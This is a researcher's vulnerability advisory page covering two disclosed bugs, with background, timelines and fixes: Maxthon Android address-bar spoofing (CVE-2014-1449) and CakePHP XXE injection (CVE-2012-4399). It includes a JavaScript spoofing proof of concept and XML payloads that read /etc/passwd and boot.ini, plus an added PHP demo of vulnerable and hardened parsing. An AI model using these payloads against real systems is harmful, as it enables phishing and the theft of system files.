Maxthon Cloud Browser for Android Address Bar Spoofing

10.01.2014

CVE-2014-1449

Spoofing

# Vulnerability: Maxthon Cloud Browser for Android Address Bar Spoofing
# Date: 10.01.2014
# Software Link: https://play.google.com/store/apps/details?id=com.mx.browser
# Vulnerable version: 4.1.4.2000
# Tested on: Android 4.4
# CVE: CVE-2014-1449
# Author: Pawel Wylecial
# http://h0wl.pl

1. Background


Description from the vendor website: "Maxthon Cloud Browser for Android is the first multi-tab browser with Maxthon’s innovative Cloud Services, including: Cloud Tabs, Cloud Push, Cloud Download and bookmarks/favorites syncing. With its cool design and out of the box features like Super Gestures, Reader Mode, App Center and more, this browser delivers a fresh and original browsing experience."

2. Vulnerability


Maxthon for Android is vulnerable to Address Bar Spoofing. Using the history API it was possible to spoof the URL shown in the address bar, which can trick the user into believing they are visiting a different site than the one actually loaded.

3. Proof of Concept



<html>
<script>
var w;
function trigger() {
        // Open a new window and navigate it twice, so that it has
        // several entries in its own history.
        w = window.open("http://howl.overflow.pl");
        w.location = "http://h0wl.pl";
        setTimeout('w.location = "a.html"', 1000);
        // Step back and then forward through that history; in the
        // vulnerable version the address bar no longer matches the
        // document that is actually displayed.
        setTimeout('w.history.back();', 2000);
        setTimeout('w.history.forward();', 2100);
}
</script>
<a href="javascript:trigger();">click</a>
</html>

PoC in action: http://howl.overflow.pl/maxthon1.mp4

4. Fix


No response from the vendor; a silent fix appears to have been applied in 4.1.5.2000 or 4.1.6.2000 (could not confirm which, as the device updated straight to 4.1.6.2000).

5. Timeline


10.01.2014 - vulnerability reported
15.01.2014 - second e-mail
21.01.2014 - third e-mail
22.01.2014 - *silent fix applied (?), http://www.maxthon.com/android/changelog/
29.01.2014 - last try
10.03.2014 - advisory published

CakePHP XXE Injection

01.07.2012

CVE-2012-4399

Information Disclosure / RCE

# Exploit title: CakePHP XXE injection
# Date: 01.07.2012
# Software Link: http://www.cakephp.org
# Vulnerable version: 2.x - 2.2.0-RC2
# Tested on: Windows and Linux
# CVE: CVE-2012-4399
# Author: Pawel Wylecial
# http://h0wl.pl

1. Background



Short description from the project website: "CakePHP makes building web applications simpler, faster and require less code."

2. Vulnerability



CakePHP is vulnerable to XML eXternal Entity (XXE) injection. The class responsible for building XML (it uses PHP's SimpleXML) resolves external entities, which allows local file inclusion: an attacker-supplied DOCTYPE can declare an entity pointing at a local file and have its contents substituted into the parsed document.

3. Proof of Concept



Linux:


<!DOCTYPE cakephp [
  <!ENTITY payload SYSTEM "file:///etc/passwd" >]>
<request>
  <xxe>&payload;</xxe>
</request>

Windows:



<!DOCTYPE cakephp [
  <!ENTITY payload SYSTEM "file:///C:/boot.ini" >]>
<request>
  <xxe>&payload;</xxe>
</request>
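The following is an added example, not CakePHP's own code, showing why the payloads above work and how a SimpleXML consumer is hardened against them. It assumes PHP 7.4 or later with the SimpleXML and libxml extensions; the "secret" file, the parseUnsafe and parseSafe functions and the request format are constructed for the demonstration.

```php
<?php
// Added example, not CakePHP's code: the advisory's payload parsed the way a
// vulnerable SimpleXML consumer does, and then the hardened way.
// Assumes PHP >= 7.4 with the SimpleXML and libxml extensions enabled.

// A constructed temporary file stands in for /etc/passwd, so the demo only
// reads data it created itself.
$secretFile = tempnam(sys_get_temp_dir(), 'xxe');
file_put_contents($secretFile, "root:x:0:0:root:/root:/bin/bash\n");

// Same shape as the PoC above, with the entity pointed at the constructed file.
$payload = <<<XML
<!DOCTYPE cakephp [
  <!ENTITY payload SYSTEM "file://{$secretFile}" >]>
<request>
  <xxe>&payload;</xxe>
</request>
XML;

// Vulnerable pattern: LIBXML_NOENT opts into entity substitution, so libxml
// reads the external entity from disk and its contents become the text of
// <xxe>. Any later echo/log/error path then leaks that text.
function parseUnsafe(string $xml): string
{
    $doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT);
    return $doc === false ? '' : (string) $doc->xxe;
}

// Hardened pattern (defence in depth):
//  1. reject any document carrying a DOCTYPE, since this request format
//     never needs one (XML requires the keyword in upper case);
//  2. parse without LIBXML_NOENT / LIBXML_DTDLOAD so nothing is substituted,
//     and with LIBXML_NONET so libxml cannot fetch resources over the network;
//  3. on PHP < 8.0 additionally switch off the external entity loader
//     (PHP 8 deprecates the call and no longer loads external entities
//     unless a parser explicitly opts in).
function parseSafe(string $xml): string
{
    if (strpos($xml, '<!DOCTYPE') !== false) {
        throw new InvalidArgumentException('DOCTYPE declarations are not accepted');
    }
    $previousLoader = null;
    if (PHP_VERSION_ID < 80000) {
        $previousLoader = libxml_disable_entity_loader(true);
    }
    $previousErrors = libxml_use_internal_errors(true);
    try {
        $doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NONET);
        if ($doc === false) {
            $messages = array_map(fn($e) => trim($e->message), libxml_get_errors());
            libxml_clear_errors();
            throw new InvalidArgumentException('Malformed XML: ' . implode('; ', $messages));
        }
        return (string) $doc->xxe;
    } finally {
        libxml_use_internal_errors($previousErrors);
        if ($previousLoader !== null) {
            libxml_disable_entity_loader($previousLoader);
        }
    }
}

echo "unsafe: ", parseUnsafe($payload), "\n";
try {
    parseSafe($payload);
} catch (InvalidArgumentException $e) {
    echo "safe:   rejected (", $e->getMessage(), ")\n";
}
echo "safe:   ", parseSafe("<request><xxe>hello</xxe></request>"), "\n";

unlink($secretFile);
```

Run it with `php xxe_demo.php`: the unsafe parse echoes the constructed file's line, the safe parse rejects the same payload before it reaches libxml, and a plain request still parses. The DOCTYPE check alone is not the protection (encoding tricks can hide the keyword from a byte-level scan); the parser flags are, and the check exists so that an attempt is rejected loudly and can be logged rather than silently producing an empty element.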

4. Fix



Fix applied in versions 2.2.1 and 2.1.5. See the official security release:
http://bakery.cakephp.org/articles/markstory/2012/07/14/security_release_-_cakephp_2_1_5_2_2_1

5. Timeline



1.07.2012 - vulnerability reported
13.07.2012 - response from CakePHP
14.07.2012 - confirmed and fix released

Contact

BlackOwlSec Pawel Wylecial
Poland
VAT-ID PL7822493185